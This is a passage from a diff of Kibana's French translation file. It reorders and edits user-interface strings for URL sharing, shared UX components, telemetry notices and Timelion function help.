"share.urlPanel.publicUrlHelpText": "Utilisez l'URL publique pour partager avec tout le monde. Elle permet un accès anonyme en une étape, en supprimant l'invite de connexion.", "share.urlPanel.publicUrlLabel": "URL publique", - "share.urlPanel.savedObjectDescription": "Vous pouvez partager cette URL avec des personnes pour leur permettre de charger la version enregistrée la plus récente de ce {objectType}.", "share.urlPanel.savedObjectLabel": "Objet enregistré", - "share.urlPanel.shortUrlHelpText": "Nous vous recommandons de partager des URL de snapshot raccourcies pour une compatibilité maximale. Internet Explorer présente des restrictions de longueur d'URL et certains analyseurs de wiki et de balisage ne fonctionnent pas bien avec les URL de snapshot longues, mais les URL courtes devraient bien fonctionner.", + "share.urlPanel.shortUrlHelpText": "Nous vous recommandons de partager des URL de snapshot raccourcies pour une compatibilité maximale. Internet Explorer présente des restrictions de longueur d'URL et certains analyseurs de wiki et de balisage ne fonctionnent pas bien avec les URL de snapshot longues, mais les URL courtes devraient bien fonctionner.", "share.urlPanel.shortUrlLabel": "URL courte", - "share.urlPanel.snapshotDescription": "Les URL de snapshot encodent l'état actuel de {objectType} dans l'URL elle-même. Les modifications apportées au {objectType} enregistré ne seront pas visibles via cette URL.", "share.urlPanel.snapshotLabel": "Snapshot", - "share.urlPanel.unableCreateShortUrlErrorMessage": "Impossible de créer une URL courte. Erreur : {errorMessage}.", "share.urlPanel.urlGroupTitle": "URL", "share.urlService.redirect.components.Error.title": "Erreur de redirection", "share.urlService.redirect.components.Spinner.label": "Redirection…", "share.urlService.redirect.RedirectManager.invalidParamParams": "Impossible d'analyser les paramètres du localisateur. Les paramètres du localisateur doivent être sérialisés en tant que JSON et définis au paramètre de recherche d'URL \"p\".", - "share.urlService.redirect.RedirectManager.locatorNotFound": "Le localisateur [ID = {id}] n'existe pas.", - "share.urlService.redirect.RedirectManager.missingParamLocator": "ID du localisateur non spécifié. Spécifiez le paramètre de recherche \"l\" dans l'URL ; ce devrait être un ID de localisateur existant.", - "share.urlService.redirect.RedirectManager.missingParamParams": "Paramètres du localisateur non spécifiés. Spécifiez le paramètre de recherche \"p\" dans l'URL ; ce devrait être un objet sérialisé JSON des paramètres du localisateur.", - "share.urlService.redirect.RedirectManager.missingParamVersion": "Version des paramètres du localisateur non spécifiée. Spécifiez le paramètre de recherche \"v\" dans l'URL ; ce devrait être la version de Kibana au moment de la génération des paramètres du localisateur.", - "sharedUXComponents.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.", - "sharedUXComponents.noDataPage.intro.link": "en savoir plus", - "sharedUXComponents.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.", - "sharedUXPackages.solutionNav.collapsibleLabel": "Réduire la navigation latérale", - "sharedUXPackages.solutionNav.menuText": "menu", + "share.urlService.redirect.RedirectManager.missingParamLocator": "ID du localisateur non spécifié. Spécifiez le paramètre de recherche \"l\" dans l'URL ; ce devrait être un ID de localisateur existant.", + "share.urlService.redirect.RedirectManager.missingParamParams": "Paramètres du localisateur non spécifiés. Spécifiez le paramètre de recherche \"p\" dans l'URL ; ce devrait être un objet sérialisé JSON des paramètres du localisateur.", + "share.urlService.redirect.RedirectManager.missingParamVersion": "Version des paramètres du localisateur non spécifiée. Spécifiez le paramètre de recherche \"v\" dans l'URL ; ce devrait être la version de Kibana au moment de la génération des paramètres du localisateur.", + "sharedUXPackages.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.", + "sharedUXPackages.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.", + "sharedUXPackages.noDataPage.intro.link": "en savoir plus", "sharedUXPackages.solutionNav.mobileTitleText": "{solutionName} {menuText}", - "sharedUXPackages.solutionNav.openLabel": "Ouvrir la navigation latérale", + "sharedUXPackages.buttonToolbar.buttons.addFromLibrary.libraryButtonLabel": "Ajouter depuis la bibliothèque", + "sharedUXPackages.card.noData.description": "Utilisez Elastic Agent pour collecter de manière simple et unifiée les données de vos machines.", + "sharedUXPackages.card.noData.noPermission.description": "Cette intégration n'est pas encore activée. Votre administrateur possède les autorisations requises pour l'activer.", + "sharedUXPackages.card.noData.noPermission.title": "Contactez votre administrateur", + "sharedUXPackages.card.noData.title": "Ajouter Elastic Agent", "sharedUXPackages.exitFullScreenButton.exitFullScreenModeButtonText": "Quitter le plein écran", "sharedUXPackages.exitFullScreenButton.fullScreenModeDescription": "En mode Plein écran, appuyez sur Échap pour quitter.", - "sharedUXPackages.noDataConfig.addIntegrationsDescription": "Utilisez Elastic Agent pour collecter des données et créer des solutions Analytics.", + "sharedUXPackages.noDataConfig.addIntegrationsDescription": "Utilisez Elastic Agent pour collecter des données et créer des solutions Analytics.", "sharedUXPackages.noDataConfig.addIntegrationsTitle": "Ajouter des intégrations", "sharedUXPackages.noDataConfig.analytics": "Analyse", - "sharedUXPackages.noDataConfig.analyticsPageTitle": "Bienvenue dans Analytics !", + "sharedUXPackages.noDataConfig.analyticsPageTitle": "Bienvenue dans Analytics !", "sharedUXPackages.noDataViewsPrompt.addDataViewText": "Créer une vue de données", "sharedUXPackages.noDataViewsPrompt.dataViewExplanation": "Les vues de données identifient les données Elasticsearch que vous souhaitez explorer. Vous pouvez faire pointer des vues de données vers un ou plusieurs flux de données, index et alias d'index, tels que vos données de log d'hier, ou vers tous les index contenant vos données de log.", - "sharedUXPackages.noDataViewsPrompt.learnMore": "Envie d'en savoir plus ?", + "sharedUXPackages.noDataViewsPrompt.learnMore": "Envie d'en savoir plus ?", "sharedUXPackages.noDataViewsPrompt.noPermission.dataViewExplanation": "Les vues de données identifient les données Elasticsearch que vous souhaitez explorer. Pour créer des vues de données, demandez les autorisations requises à votre administrateur.", "sharedUXPackages.noDataViewsPrompt.noPermission.title": "Vous devez disposer d'une autorisation pour pouvoir créer des vues de données", "sharedUXPackages.noDataViewsPrompt.nowCreate": "Créez à présent une vue de données.", "sharedUXPackages.noDataViewsPrompt.readDocumentation": "Lisez les documents", "sharedUXPackages.noDataViewsPrompt.youHaveData": "Vous avez des données dans Elasticsearch.", + "sharedUXPackages.solutionNav.collapsibleLabel": "Réduire la navigation latérale", + "sharedUXPackages.solutionNav.menuText": "menu", + "sharedUXPackages.solutionNav.openLabel": "Ouvrir la navigation latérale", "telemetry.callout.appliesSettingTitle": "Les modifications apportées à ce paramètre s'appliquent dans {allOfKibanaText} et sont enregistrées automatiquement.", + "telemetry.seeExampleOfClusterDataAndEndpointSecuity": "Découvrez des exemples de {clusterData} et de {securityData} que nous collectons.", + "telemetry.telemetryBannerDescription": "Vous souhaitez nous aider à améliorer la Suite Elastic ? La collecte de données d'utilisation est actuellement désactivée. En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.", + "telemetry.telemetryConfigAndLinkDescription": "En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.", + "telemetry.telemetryOptedInNoticeDescription": "Pour en savoir plus sur la manière dont les données d'utilisation nous aident à gérer et à améliorer nos produits et nos services, consultez notre {privacyStatementLink}. Pour mettre fin à la collecte, {disableLink}.", "telemetry.callout.appliesSettingTitle.allOfKibanaText": "tout Kibana", "telemetry.callout.clusterStatisticsDescription": "Voici un exemple des statistiques de cluster de base que nous collecterons. Cela comprend le nombre d'index, de partitions et de nœuds. Cela comprend également des statistiques d'utilisation de niveau élevé, comme l'état d'activation du monitoring.", "telemetry.callout.clusterStatisticsTitle": "Statistiques du cluster", @@ -5576,20 +4701,48 @@ "telemetry.provideUsageDataTitle": "Fournir les données d'utilisation", "telemetry.readOurUsageDataPrivacyStatementLinkText": "Déclaration de confidentialité", "telemetry.securityData": "données de sécurité", - "telemetry.seeExampleOfClusterDataAndEndpointSecuity": "Découvrez des exemples de {clusterData} et de {securityData} que nous collectons.", - "telemetry.telemetryBannerDescription": "Vous souhaitez nous aider à améliorer la Suite Elastic ? La collecte de données d'utilisation est actuellement désactivée. En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.", - "telemetry.telemetryConfigAndLinkDescription": "En activant la collecte de données d'utilisation, vous nous aidez à gérer et à améliorer nos produits et nos services. Consultez notre {privacyStatementLink} pour plus d'informations.", "telemetry.telemetryOptedInDisableUsage": "désactivez les données d'utilisation ici", "telemetry.telemetryOptedInDismissMessage": "Rejeter", - "telemetry.telemetryOptedInNoticeDescription": "Pour en savoir plus sur la manière dont les données d'utilisation nous aident à gérer et à améliorer nos produits et nos services, consultez notre {privacyStatementLink}. Pour mettre fin à la collecte, {disableLink}.", - "telemetry.telemetryOptedInNoticeTitle": "Aidez-nous à améliorer la Suite Elastic.", + "telemetry.telemetryOptedInNoticeTitle": "Aidez-nous à améliorer la Suite Elastic.", "telemetry.telemetryOptedInPrivacyStatement": "Déclaration de confidentialité", "telemetry.usageDataTitle": "Données d'utilisation", "telemetry.welcomeBanner.disableButtonLabel": "Désactiver", "telemetry.welcomeBanner.enableButtonLabel": "Activer", "telemetry.welcomeBanner.telemetryConfigDetailsDescription.telemetryPrivacyStatementLinkText": "Déclaration de confidentialité", - "telemetry.welcomeBanner.title": "Aidez-nous à améliorer la Suite Elastic.", - "timelion.emptyExpressionErrorMessage": "Erreur Timelion : aucune expression fournie", + "telemetry.welcomeBanner.title": "Aidez-nous à améliorer la Suite Elastic.", + "timelion.help.functions.aggregate.args.functionHelpText": "L'une des options suivantes : {functions}.", + "timelion.help.functions.aggregateHelpText": "Crée une ligne statique sur la base du résultat du traitement de tous les points de la série. Fonctions disponibles : {functions}", + "timelion.help.functions.common.args.fitHelpText": "Algorithme à utiliser pour adapter les séries à l'intervalle et à la période cible. Disponible : {fitFunctions}", + "timelion.help.functions.es.args.splitHelpText": "Un champ Elasticsearch avec lequel diviser la série et une limite. Par ex. \"{hostnameSplitArg}\" pour obtenir les 10 premiers noms d'hôte.", + "timelion.help.functions.fit.args.modeHelpText": "L'algorithme à utiliser pour adapter les séries à la cible. L'une des options suivantes : {fitFunctions}.", + "timelion.help.functions.legend.args.timeFormatHelpText": "Modèle de format moment.js. Par défaut : {defaultTimeFormat}", + "timelion.help.functions.movingaverage.args.positionHelpText": "Position des points moyens par rapport à l'heure du résultat. L'une des options suivantes : {validPositions}.", + "timelion.help.functions.movingstd.args.positionHelpText": "Position de la section de la fenêtre par rapport à l'heure du résultat. Les options sont {positions}. Par défaut : {defaultPosition}.", + "timelion.help.functions.points.args.symbolHelpText": "symbole de point. L'une des options suivantes : {validSymbols}", + "timelion.help.functions.propsHelpText": "À utiliser à vos risques et périls ; définit des propriétés arbitraires sur la série. Par exemple : {example}", + "timelion.help.functions.trend.args.modeHelpText": "L'algorithme à utiliser pour générer la courbe de tendance. L'une des options suivantes : {validRegressions}.", + "timelion.help.functions.worldbank.args.codeHelpText": "Chemin de l'API Worldbank (Banque mondiale). Il s'agit généralement de tout ce qui suit le domaine, avant la chaîne de requête. Par exemple : {apiPathExample}.", + "timelion.help.functions.worldbankHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du chemin d’accès aux séries.\n La Banque mondiale fournit surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours.\n Essayez {offsetQuery} si vous n’obtenez pas de données pour les plages temporelles récentes.", + "timelion.help.functions.worldbankIndicators.args.indicatorHelpText": "Le code d'indicateur à utiliser. Vous devrez le rechercher sur {worldbankUrl}. Souvent très complexe. Par exemple, {indicatorExample} correspond à la population.", + "timelion.help.functions.worldbankIndicatorsHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du nom et de l'indicateur du pays. La Banque mondiale fournit\n surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours. Essayez {offsetQuery} si vous n’obtenez pas de données pour\n les plages temporelles récentes.", + "timelion.help.functions.yaxis.args.unitsHelpText": "La fonction à utiliser pour mettre en forme les étiquettes de l'axe Y. L'une des options suivantes : {formatters}.", + "timelion.noFunctionErrorMessage": "Fonction inconnue : {name}", + "timelion.serverSideErrors.argumentsOverflowErrorMessage": "Trop d'arguments transmis à : {functionName}", + "timelion.serverSideErrors.bucketsOverflowErrorMessage": "Nombre max. de compartiments dépassé : {bucketCount} sur {maxBuckets} autorisés. Sélectionnez un intervalle plus grand ou une période plus courte.", + "timelion.serverSideErrors.errorInCell": " dans la cellule n{number} : {message}", + "timelion.serverSideErrors.esFunction.indexNotFoundErrorMessage": "Index Elasticsearch introuvable : {index}", + "timelion.serverSideErrors.movingaverageFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.", + "timelion.serverSideErrors.movingstdFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.", + "timelion.serverSideErrors.pointsFunction.notValidSymbolErrorMessage": "Les symboles valides sont : {validSymbols}.", + "timelion.serverSideErrors.sheetParseErrorMessage": "Attendu : {expectedDescription} au caractère {column}", + "timelion.serverSideErrors.unknownArgumentErrorMessage": "Argument inconnu pour {functionName} : {argumentName}", + "timelion.serverSideErrors.unknownArgumentTypeErrorMessage": "Type d'argument non pris en charge : {argument}", + "timelion.serverSideErrors.worldbankFunction.noDataErrorMessage": "La requête à la Banque mondiale a réussi, mais il n'y a pas de données pour {code}.", + "timelion.serverSideErrors.wrongFunctionArgumentTypeErrorMessage": "{functionName}({argumentName}) doit être l'une des options suivantes : {requiredTypes}. Obtenu : {actualType}", + "timelion.serverSideErrors.yaxisFunction.notSupportedUnitTypeErrorMessage": "{units} n'est pas un type d'unité pris en charge.", + "timelion.uiSettings.defaultIndexDescription": "Index Elasticsearch par défaut dans lequel rechercher avec {esParam}", + "timelion.uiSettings.timeFieldDescription": "Champ par défaut contenant un horodatage lors de l'utilisation de {esParam}", + "timelion.emptyExpressionErrorMessage": "Erreur Timelion : aucune expression fournie", "timelion.expressionSuggestions.argument.description.acceptsText": "Accepte", "timelion.expressionSuggestions.func.description.chainableHelpText": "Enchaînable", "timelion.expressionSuggestions.func.description.dataSourceHelpText": "Source de données", @@ -5597,15 +4750,12 @@ "timelion.function.args.ariaLabelHelpText": "Spécifie l'attribut aria-label du timelion", "timelion.function.help": "Visualisation Timelion", "timelion.help.functions.absHelpText": "Renvoyer la valeur absolue de chaque valeur dans la liste des séries", - "timelion.help.functions.aggregate.args.functionHelpText": "L'une des options suivantes : {functions}.", - "timelion.help.functions.aggregateHelpText": "Crée une ligne statique sur la base du résultat du traitement de tous les points de la série. Fonctions disponibles : {functions}", "timelion.help.functions.bars.args.stackHelpText": "Vrai par défaut si les barres sont empilées", "timelion.help.functions.bars.args.widthHelpText": "Largeur des barres en pixels", "timelion.help.functions.barsHelpText": "Afficher la liste des séries sous la forme de barres", - "timelion.help.functions.color.args.colorHelpText": "Couleur des séries en valeurs hexadécimales, par ex. #c6c6c6 est un très joli gris clair. Si vous spécifiez plusieurs couleurs et que vous avez plusieurs séries, vous obtiendrez un dégradé, par ex. \"#00B1CC:#00FF94:#FF3A39:#CC1A6F\".", + "timelion.help.functions.color.args.colorHelpText": "Couleur des séries en valeurs hexadécimales, par ex. #c6c6c6 est un très joli gris clair. Si vous spécifiez plusieurs couleurs et que vous avez plusieurs séries, vous obtiendrez un dégradé, par ex. \"#00B1CC:#00FF94:#FF3A39:#CC1A6F\".", "timelion.help.functions.colorHelpText": "Changer la couleur des séries", - "timelion.help.functions.common.args.fitHelpText": "Algorithme à utiliser pour adapter les séries à l'intervalle et à la période cible. Disponible : {fitFunctions}", - "timelion.help.functions.common.args.offsetHelpText": "Décalez la récupération des séries avec une expression de date, par ex. -1M pour afficher les événements d'il y a un mois comme s'ils se produisaient maintenant. Décalez les séries par rapport à la plage temporelle globale des graphiques en utilisant la valeur \"timerange\", par ex. \"timerange:-2\" pour obtenir un décalage correspondant à deux fois la plage temporelle globale du graphique dans le passé.", + "timelion.help.functions.common.args.offsetHelpText": "Décalez la récupération des séries avec une expression de date, par ex. -1M pour afficher les événements d'il y a un mois comme s'ils se produisaient maintenant. Décalez les séries par rapport à la plage temporelle globale des graphiques en utilisant la valeur \"timerange\", par ex. \"timerange:-2\" pour obtenir un décalage correspondant à deux fois la plage temporelle globale du graphique dans le passé.", "timelion.help.functions.condition.args.elseHelpText": "La valeur à laquelle le point sera défini si la comparaison est fausse. Si vous spécifiez une liste de séries, la première série sera utilisée.", "timelion.help.functions.condition.args.ifHelpText": "La valeur à laquelle le point sera comparé. Si vous spécifiez une liste de séries, la première série sera utilisée.", "timelion.help.functions.condition.args.operator.suggestions.eqHelpText": "égal", @@ -5614,7 +4764,7 @@ "timelion.help.functions.condition.args.operator.suggestions.lteHelpText": "inférieur ou égal", "timelion.help.functions.condition.args.operator.suggestions.ltHelpText": "inférieur à", "timelion.help.functions.condition.args.operator.suggestions.neHelpText": "différent", - "timelion.help.functions.condition.args.operatorHelpText": "Opérateur de comparaison à utiliser pour la comparaison ; les opérateurs valides sont eq (égal), ne (différent), lt (inférieur à), lte (inférieur ou égal), gt (supérieur à), gte (supérieur ou égal).", + "timelion.help.functions.condition.args.operatorHelpText": "Opérateur de comparaison à utiliser pour la comparaison ; les opérateurs valides sont eq (égal), ne (différent), lt (inférieur à), lte (inférieur ou égal), gt (supérieur à), gte (supérieur ou égal).", "timelion.help.functions.condition.args.thenHelpText": "La valeur à laquelle le point sera défini si la comparaison est vraie. Si vous spécifiez une liste de séries, la première série sera utilisée.", "timelion.help.functions.conditionHelpText": "Compare chaque point à un nombre ou au même point dans une autre série à l'aide d'un opérateur, puis définit sa valeur sur le résultat si la condition est vraie, avec un sinon facultatif.", "timelion.help.functions.cusum.args.baseHelpText": "Numéro auquel commencer. Cela ajoute simplement ce numéro au début de la série", @@ -5625,23 +4775,21 @@ "timelion.help.functions.es.args.indexHelpText": "Index à interroger, caractères génériques acceptés. Fournissez le nom du modèle d'indexation pour les champs scriptés et le type de nom de champ devant les suggestions pour les arguments metrics, split et timefield.", "timelion.help.functions.es.args.intervalHelpText": "**NE PAS UTILISER**. C'est amusant pour déboguer les fonctions fit, mais vous devriez vraiment utiliser le sélecteur d'intervalle.", "timelion.help.functions.es.args.kibanaHelpText": "Respectez les filtres des tableaux de bord Kibana. Cela n'a d'effet qu’en cas d'utilisation dans des tableaux de bord Kibana", - "timelion.help.functions.es.args.metricHelpText": "Une agrégation d'indicateurs Elasticsearch Moyenne, Somme, Min, Max, Centiles ou Cardinalité, puis un champ. Par ex. \"sum:bytes\", \"percentiles:bytes:95,99,99.9\" ou simplement \"count\".", + "timelion.help.functions.es.args.metricHelpText": "Une agrégation d'indicateurs Elasticsearch Moyenne, Somme, Min, Max, Centiles ou Cardinalité, puis un champ. Par ex. \"sum:bytes\", \"percentiles:bytes:95,99,99.9\" ou simplement \"count\".", "timelion.help.functions.es.args.qHelpText": "Requête dans la syntaxe de chaîne de requête Lucene", - "timelion.help.functions.es.args.splitHelpText": "Un champ Elasticsearch avec lequel diviser la série et une limite. Par ex. \"{hostnameSplitArg}\" pour obtenir les 10 premiers noms d'hôte.", - "timelion.help.functions.es.args.timefieldHelpText": "Champ de type \"date\" à utiliser pour l'axe X", + "timelion.help.functions.es.args.timefieldHelpText": "Champ de type \"date\" à utiliser pour l'axe X", "timelion.help.functions.esHelpText": "Extraire des données d'une instance Elasticsearch", "timelion.help.functions.firstHelpText": "Il s'agit d'une fonction interne qui renvoie simplement la liste de séries d'entrée. Ne l'utilisez pas.", - "timelion.help.functions.fit.args.modeHelpText": "L'algorithme à utiliser pour adapter les séries à la cible. L'une des options suivantes : {fitFunctions}.", "timelion.help.functions.fitHelpText": "Remplit les valeurs nulles à l'aide d'une fonction fit définie.", "timelion.help.functions.hide.args.hideHelpText": "Masquer ou afficher les séries", "timelion.help.functions.hideHelpText": "Masquer les séries par défaut", - "timelion.help.functions.holt.args.alphaHelpText": "\n Pondération de lissage de 0 à 1.\n Augmentez l’alpha pour que la nouvelle série suive de plus près l'originale.\n Diminuez-le pour rendre la série plus lisse.", - "timelion.help.functions.holt.args.betaHelpText": "\n Pondération de tendance de 0 à 1.\n Augmentez le bêta pour que les lignes montantes/descendantes continuent à monter/descendre plus longtemps.\n Diminuez-le pour que la fonction apprenne plus rapidement la nouvelle tendance.", - "timelion.help.functions.holt.args.gammaHelpText": "\n Pondération saisonnière de 0 à 1. Vos données ressemblent-elles à une vague ?\n Augmentez cette valeur pour donner plus d'importance aux saisons récentes et ainsi modifier plus rapidement la forme de la vague.\n Diminuez-la pour réduire l'importance des nouvelles saisons et ainsi rendre l'historique plus important.\n ", - "timelion.help.functions.holt.args.sampleHelpText": "\n Le nombre de saisons à échantillonner avant de commencer à \"prédire\" dans une série saisonnière.\n (Utile uniquement avec gamma, par défaut : all)", - "timelion.help.functions.holt.args.seasonHelpText": "La longueur de la saison, par ex. 1w, si votre modèle se répète chaque semaine. (Utile uniquement avec gamma)", + "timelion.help.functions.holt.args.alphaHelpText": "\n Pondération de lissage de 0 à 1.\n Augmentez l’alpha pour que la nouvelle série suive de plus près l'originale.\n Diminuez-le pour rendre la série plus lisse.", + "timelion.help.functions.holt.args.betaHelpText": "\n Pondération de tendance de 0 à 1.\n Augmentez le bêta pour que les lignes montantes/descendantes continuent à monter/descendre plus longtemps.\n Diminuez-le pour que la fonction apprenne plus rapidement la nouvelle tendance.", + "timelion.help.functions.holt.args.gammaHelpText": "\n Pondération saisonnière de 0 à 1. Vos données ressemblent-elles à une vague ?\n Augmentez cette valeur pour donner plus d'importance aux saisons récentes et ainsi modifier plus rapidement la forme de la vague.\n Diminuez-la pour réduire l'importance des nouvelles saisons et ainsi rendre l'historique plus important.\n ", + "timelion.help.functions.holt.args.sampleHelpText": "\n Le nombre de saisons à échantillonner avant de commencer à \"prédire\" dans une série saisonnière.\n (Utile uniquement avec gamma, par défaut : all)", + "timelion.help.functions.holt.args.seasonHelpText": "La longueur de la saison, par ex. 1w, si votre modèle se répète chaque semaine. (Utile uniquement avec gamma)", "timelion.help.functions.holtHelpText": "\n Échantillonner le début d'une série et l'utiliser pour prévoir ce qui devrait se produire\n via plusieurs paramètres facultatifs. En règle générale, cela ne prédit pas\n l'avenir, mais ce qui devrait se produire maintenant en fonction des données passées,\n ce qui peut être utile pour la détection des anomalies. Notez que les valeurs null seront remplacées par des valeurs prévues.", - "timelion.help.functions.label.args.labelHelpText": "Valeur de légende pour les séries. Vous pouvez utiliser $1, $2, etc. dans la chaîne pour correspondre aux groupes de captures d'expressions régulières.", + "timelion.help.functions.label.args.labelHelpText": "Valeur de légende pour les séries. Vous pouvez utiliser $1, $2, etc. dans la chaîne pour correspondre aux groupes de captures d'expressions régulières.", "timelion.help.functions.label.args.regexHelpText": "Une expression régulière compatible avec les groupes de captures", "timelion.help.functions.labelHelpText": "Modifiez l'étiquette des séries. Utiliser %s pour référencer l'étiquette existante", "timelion.help.functions.legend.args.columnsHelpText": "Nombre de colonnes à utiliser lors de la division de la légende", @@ -5650,45 +4798,40 @@ "timelion.help.functions.legend.args.position.suggestions.nwHelpText": "placer la légende dans le coin nord-ouest", "timelion.help.functions.legend.args.position.suggestions.seHelpText": "placer la légende dans le coin sud-est", "timelion.help.functions.legend.args.position.suggestions.swHelpText": "placer la légende dans le coin sud-ouest", - "timelion.help.functions.legend.args.positionHelpText": "Coin dans lequel placer la légende : nw, ne, se ou sw. Il est également possible d'indiquer \"false\" pour désactiver la légende.", - "timelion.help.functions.legend.args.showTimeHelpText": "Afficher la valeur temporelle en légende lors du passage du curseur sur le graphique. Par défaut : true.", - "timelion.help.functions.legend.args.timeFormatHelpText": "Modèle de format moment.js. Par défaut : {defaultTimeFormat}", + "timelion.help.functions.legend.args.positionHelpText": "Coin dans lequel placer la légende : nw, ne, se ou sw. Il est également possible d'indiquer \"false\" pour désactiver la légende.", + "timelion.help.functions.legend.args.showTimeHelpText": "Afficher la valeur temporelle en légende lors du passage du curseur sur le graphique. Par défaut : true.", "timelion.help.functions.legendHelpText": "Définir la position et le style de la légende sur le tracé", "timelion.help.functions.lines.args.fillHelpText": "Nombre compris entre 0 et 10. À utiliser pour créer des graphiques en aires.", "timelion.help.functions.lines.args.showHelpText": "Afficher ou masquer les lignes", "timelion.help.functions.lines.args.stackHelpText": "Empiler les lignes, souvent équivoque. Utilisez au moins des remplissages si vous utilisez cette option.", - "timelion.help.functions.lines.args.stepsHelpText": "Afficher la ligne comme une étape ; autrement dit, ne pas interpoler entre les points", + "timelion.help.functions.lines.args.stepsHelpText": "Afficher la ligne comme une étape ; autrement dit, ne pas interpoler entre les points", "timelion.help.functions.lines.args.widthHelpText": "Épaisseur de ligne", "timelion.help.functions.linesHelpText": "Afficher la liste de séries sous la forme de lignes", - "timelion.help.functions.log.args.baseHelpText": "Définir la base logarithmique ; 10 par défaut", - "timelion.help.functions.logHelpText": "Renvoyer la valeur logarithmique de chaque valeur de la liste des séries (base par défaut : 10)", - "timelion.help.functions.max.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus élevée des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.", + "timelion.help.functions.log.args.baseHelpText": "Définir la base logarithmique ; 10 par défaut", + "timelion.help.functions.logHelpText": "Renvoyer la valeur logarithmique de chaque valeur de la liste des séries (base par défaut : 10)", + "timelion.help.functions.max.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus élevée des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.", "timelion.help.functions.maxHelpText": "Valeurs maximales d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.", - "timelion.help.functions.min.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus basse des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.", + "timelion.help.functions.min.args.valueHelpText": "Définit le point sur la valeur existante ou la valeur transmise, selon la plus basse des deux. Si une liste de séries est transmise, elle doit contenir exactement 1 série.", "timelion.help.functions.minHelpText": "Valeurs minimales d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.", - "timelion.help.functions.movingaverage.args.positionHelpText": "Position des points moyens par rapport à l'heure du résultat. L'une des options suivantes : {validPositions}.", "timelion.help.functions.movingaverage.args.windowHelpText": "Nombre de points ou une expression mathématique de date (par ex. 1d, 1M) à utiliser pour calculer la moyenne. Si une expression mathématique de date est spécifiée, la fonction sera la plus proche possible compte tenu de l'intervalle sélectionné. Si l'expression mathématique de date n'est pas divisible uniformément par l'intervalle, les résultats peuvent sembler être anormaux.", "timelion.help.functions.movingaverageHelpText": "Calculez la moyenne mobile pour une fenêtre donnée. Idéal pour lisser les séries avec beaucoup de bruit.", - "timelion.help.functions.movingstd.args.positionHelpText": "Position de la section de la fenêtre par rapport à l'heure du résultat. Les options sont {positions}. Par défaut : {defaultPosition}.", "timelion.help.functions.movingstd.args.windowHelpText": "Nombre de points à utiliser pour calculer l'écart-type.", "timelion.help.functions.movingstdHelpText": "Calculez l'écart-type mobile pour une fenêtre donnée. Utilise l'algorithme naïf en deux passes. Les erreurs d'arrondi peuvent devenir plus évidentes avec les séries très longues ou celles comportant de très grands nombres.", "timelion.help.functions.multiply.args.multiplierHelpText": "Nombre de séries par lequel multiplier. Une liste de plusieurs séries sera appliquée pour l'étiquette.", "timelion.help.functions.multiplyHelpText": "Multiplie les valeurs d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.", "timelion.help.functions.points.args.fillColorHelpText": "Couleur à utiliser pour remplir le point", - "timelion.help.functions.points.args.fillHelpText": "Nombre compris entre 0 et 10 représentant l'opacité du remplissage", + "timelion.help.functions.points.args.fillHelpText": "Nombre compris entre 0 et 10 représentant l'opacité du remplissage", "timelion.help.functions.points.args.radiusHelpText": "Taille des points", "timelion.help.functions.points.args.showHelpText": "Afficher ou non les points", - "timelion.help.functions.points.args.symbolHelpText": "symbole de point. L'une des options suivantes : {validSymbols}", "timelion.help.functions.points.args.weightHelpText": "Épaisseur de la ligne autour du point", "timelion.help.functions.pointsHelpText": "Afficher les séries sous la forme de points", "timelion.help.functions.precision.args.precisionHelpText": "Le nombre de chiffres à garder lors de la troncature de chaque valeur", "timelion.help.functions.precisionHelpText": "Le nombre de chiffres à garder lors de la troncature de la partie décimale de la valeur", "timelion.help.functions.props.args.globalHelpText": "Définir des propositions sur la liste de séries plutôt que sur chaque série", - "timelion.help.functions.propsHelpText": "À utiliser à vos risques et périls ; définit des propriétés arbitraires sur la série. Par exemple : {example}", "timelion.help.functions.range.args.maxHelpText": "Nouvelle valeur maximale", "timelion.help.functions.range.args.minHelpText": "Nouvelle valeur minimale", "timelion.help.functions.rangeHelpText": "Modifie le maximum et le minimum d'une série sans changer la forme.", - "timelion.help.functions.scaleInterval.args.intervalHelpText": "Le nouvel intervalle en notation mathématique de date, par ex. 1s pour 1 seconde. 1m, 5m, 1M, 1w, 1y, etc.", + "timelion.help.functions.scaleInterval.args.intervalHelpText": "Le nouvel intervalle en notation mathématique de date, par ex. 1s pour 1 seconde. 1m, 5m, 1M, 1w, 1y, etc.", "timelion.help.functions.scaleIntervalHelpText": "Scale une valeur (généralement une somme ou un décompte) à un nouvel intervalle. Par exemple, un taux par seconde.", "timelion.help.functions.static.args.labelHelpText": "Une manière rapide de définir l'étiquette pour la série. Vous pouvez également utiliser la fonction .label().", "timelion.help.functions.static.args.valueHelpText": "La valeur unique à afficher. Vous pouvez également passer plusieurs valeurs, elles seront interpolées uniformément sur la plage temporelle.", @@ -5699,78 +4842,194 @@ "timelion.help.functions.sumHelpText": "Ajoute les valeurs d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.", "timelion.help.functions.title.args.titleHelpText": "Titre pour le tracé.", "timelion.help.functions.titleHelpText": "Ajoute un titre en 